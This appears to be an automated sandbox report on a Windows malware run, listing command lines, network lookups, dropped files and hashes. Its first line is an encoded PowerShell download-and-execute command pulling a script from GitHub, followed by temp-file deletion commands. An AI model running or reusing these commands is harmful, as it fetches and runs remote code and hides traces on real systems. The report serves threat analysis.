powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.1.37.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | www.speedtest.net | udp |
| US | 104.18.202.232:80 | www.speedtest.net | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.202.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.speedtest.net | udp |
| US | 151.101.2.219:443 | c.speedtest.net | tcp |
| US | 8.8.8.8:53 | speedtest.ld7.connectfibre.co.uk | udp |
| GB | 80.79.63.16:8080 | speedtest.ld7.connectfibre.co.uk | tcp |
| US | 8.8.8.8:53 | st-3.fibrenest.net | udp |
| GB | 154.62.164.132:8080 | st-3.fibrenest.net | tcp |
| US | 8.8.8.8:53 | speedtest.zzoomm.com | udp |
| GB | 91.193.9.14:8080 | speedtest.zzoomm.com | tcp |
| US | 8.8.8.8:53 | speedtest-3.compute.dc1.cilix.cloud | udp |
| PL | 178.248.72.8:8080 | speedtest-3.compute.dc1.cilix.cloud | tcp |
| US | 8.8.8.8:53 | dfsrakizimoy34ggf.xyz | udp |
| US | 8.8.8.8:53 | 219.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.63.79.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.164.62.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.9.193.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.72.248.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
Files
memory/228-0-0x00000000004A0000-0x00000000012F7000-memory.dmp
memory/228-5-0x00000240BE6E0000-0x00000240BEAE4000-memory.dmp
memory/228-8-0x00000240FFC80000-0x00000240FFC90000-memory.dmp
memory/228-6-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp
memory/228-7-0x00000240FFC80000-0x00000240FFC90000-memory.dmp
memory/228-9-0x00000240FFC80000-0x00000240FFC90000-memory.dmp
memory/1828-12-0x000002074CAC0000-0x000002074CAE2000-memory.dmp
memory/1828-13-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp
memory/1828-14-0x000002074CAB0000-0x000002074CAC0000-memory.dmp
memory/1828-15-0x000002074CAB0000-0x000002074CAC0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_orlfxsph.yo4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1828-25-0x000002074CAB0000-0x000002074CAC0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 28d9755addec05c0b24cca50dfe3a92b |
| SHA1 | 7d3156f11c7a7fb60d29809caf93101de2681aa3 |
| SHA256 | abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9 |
| SHA512 | 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42 |
\??\c:\Users\Admin\AppData\Local\Temp\0qffd0uq\0qffd0uq.cmdline
| MD5 | 6ae66e20610b777e02b43504b820bb78 |
| SHA1 | 8d50a05e429f0d6d26f67e4986d3ca29d3ec2a70 |
| SHA256 | bf4ad093068496363288005aa16e87b52bfce14b8c3dfc41a80c7e840112fc7d |
| SHA512 | 8d41e84b1bed309eeb9665374a453ed3d093e1daa24e0d631d89da0a73ea105a9785c6d76bea7a51d2cfe5dc2da70d7ec3b50c1fbe9400244d66ce183d8ff37d |
\??\c:\Users\Admin\AppData\Local\Temp\0qffd0uq\0qffd0uq.0.cs
| MD5 | 9f8ab7eb0ab21443a2fe06dab341510e |
| SHA1 | 2b88b3116a79e48bab7114e18c9b9674e8a52165 |
| SHA256 | e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9 |
| SHA512 | 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b |
\??\c:\Users\Admin\AppData\Local\Temp\0qffd0uq\CSCC28D76AEF0B9439CA13729E6FCF9B6F.TMP
| MD5 | 9d81e7fb9e731579b845854c82751375 |
| SHA1 | 6fd00b9c8ef551c6ea5cbbd60dd708ac3850a1d3 |
| SHA256 | 96bdeb6702a5ec92dc7f2b210e3fffd2e445b29c07c8796836e5288a647e1bdb |
| SHA512 | f7a4a5b7ae30958a0a47459a0ac31cd5784dbc13e006801048bb5e8e23874a3063cec6b8ebe617b42e1e9a37944f53197b55f18adbe954a3aae74932a342f8a1 |
C:\Users\Admin\AppData\Local\Temp\RES94CE.tmp
| MD5 | d357c066adb45598f2debee882e0085a |
| SHA1 | 608d9425f18168e6c928ee4e1d40a58e8e98b38d |
| SHA256 | 1e024096de5adb138a02218549ba8c333a0d464f8899e1581fa70af786383c7f |
| SHA512 | e48c46e9d7eb4a78f4cdf01aa369d175c0e3bf2ceb8896b0d211505df9294d41a37ef36aa169d8f39983ce0296680c92670f16e17abe8ca0f097eade62d8f5ac |
C:\Users\Admin\AppData\Local\Temp\0qffd0uq\0qffd0uq.dll
| MD5 | 665b3685e29fe119623979ab36107f85 |
| SHA1 | 0ef83eba63a9d569d5354ce6be017f70080ef433 |
| SHA256 | 480db873f3fa57ed91ca0cb4a4d69fb8fc7a86543d9896c3939df4b2670991dc |
| SHA512 | c8b230feece66ec5052850b0073179d1bbb16dae193b33864386fdf27740690392523a5e173cfe224524c9ea4020e13b583192f0f10489106f3c6ae35610b53d |
memory/1828-39-0x0000020734880000-0x0000020734888000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
| MD5 | 5db5ffa607b5b5ca17bfd6fb78403660 |
| SHA1 | 1e793958cb1dd1dc99da4a50beaa2945561b7a16 |
| SHA256 | 1fa24f444e6b18ab2072201a5d9de4df325830990f073194addb5327137c2e89 |
| SHA512 | 3d2eab2b02c1d7302b563e3cc232791e242c8d2686a0a4cb58115cdd4ca19f48e390791404f62fef2c0fdbe3e5185b260de6a8fd5ccef2e091d473e0186ffe43 |
memory/1828-42-0x000002074D020000-0x000002074D196000-memory.dmp
memory/228-43-0x00000240BEAE0000-0x00000240BEC89000-memory.dmp
memory/1828-44-0x000002074D3B0000-0x000002074D5BA000-memory.dmp
memory/3180-54-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp
memory/3180-55-0x0000020A9D700000-0x0000020A9D710000-memory.dmp
memory/228-56-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp
memory/3180-57-0x0000020A9D700000-0x0000020A9D710000-memory.dmp
memory/3180-58-0x0000020A9D700000-0x0000020A9D710000-memory.dmp
memory/3180-59-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp
memory/4768-60-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp
memory/4768-61-0x00000249AF8B0000-0x00000249AF8C0000-memory.dmp
memory/4768-62-0x00000249AF8B0000-0x00000249AF8C0000-memory.dmp
memory/4768-72-0x00000249AF8B0000-0x00000249AF8C0000-memory.dmp
memory/4768-73-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp
memory/1144-83-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp
memory/1144-84-0x0000025B797F0000-0x0000025B79800000-memory.dmp
memory/1828-85-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp
memory/1144-86-0x0000025B797F0000-0x0000025B79800000-memory.dmp
memory/1828-87-0x000002074CAB0000-0x000002074CAC0000-memory.dmp
memory/1144-88-0x0000025B797F0000-0x0000025B79800000-memory.dmp
memory/1144-89-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp
memory/1828-90-0x000002074CAB0000-0x000002074CAC0000-memory.dmp
memory/1828-91-0x00007FFC58E10000-0x00007FFC58E29000-memory.dmp
memory/1828-93-0x000002074CAB0000-0x000002074CAC0000-memory.dmp
memory/1828-94-0x000002074CAB0000-0x000002074CAC0000-memory.dmp
C:\Windows\system32\rfxvmt.dll
| MD5 | dc39d23e4c0e681fad7a3e1342a2843c |
| SHA1 | 58fd7d50c2dca464a128f5e0435d6f0515e62073 |
| SHA256 | 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9 |
| SHA512 | 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7 |
C:\Windows\Branding\mediasrv.png
| MD5 | 96e498a3833f52ae46bcfdc391f73cf7 |
| SHA1 | ecaf72b46cf1cb074bde2914963bb1e61450ca95 |
| SHA256 | 21a0a297e9a2295f7e32aea08ea74c01199cc57d30b8a177fa99c9cc96a6268b |
| SHA512 | 9f273a77d434807138c884cc95deb1cadea1ff6db492839d238759a265f3b0ded318b6af59d0743f8dd1555e968afb1eca9ba92a214ecd247480d2a072c08540 |
C:\Windows\Branding\mediasvc.png
| MD5 | 2ee3d03bb1f8bd257235fc70e92b17e1 |
| SHA1 | c36482b8f8229578dec1cc687aaf53084cb6d05e |
| SHA256 | b7a9b4269995093c63efe64cb65e4562680af2fdf7c4dfdc235f2eb60c469ff0 |
| SHA512 | 39f8a42a512e4bfbf84ac3c472bf9444a139da23b7007f57aa68dc9ba9db5466b7f155df18c0a49e3073527763ef459180ab1912e53453d312c17718ab67abea |
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/4400-114-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp
memory/4400-115-0x0000020A93300000-0x0000020A93310000-memory.dmp
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE416.tmp
| MD5 | d0e162c0bd0629323ebb1ed88df890d6 |
| SHA1 | cf3fd2652cdb6ff86d1df215977454390ed4d7bc |
| SHA256 | 3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744 |
| SHA512 | a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117 |
memory/4400-158-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp
memory/1828-160-0x000002074CAB0000-0x000002074CAC0000-memory.dmp
memory/1828-164-0x00007FFC58E10000-0x00007FFC58E29000-memory.dmp
memory/1828-165-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp
memory/228-167-0x00000240BEAE0000-0x00000240BEC89000-memory.dmp
memory/228-168-0x00007FFC4B3D0000-0x00007FFC4BE91000-memory.dmp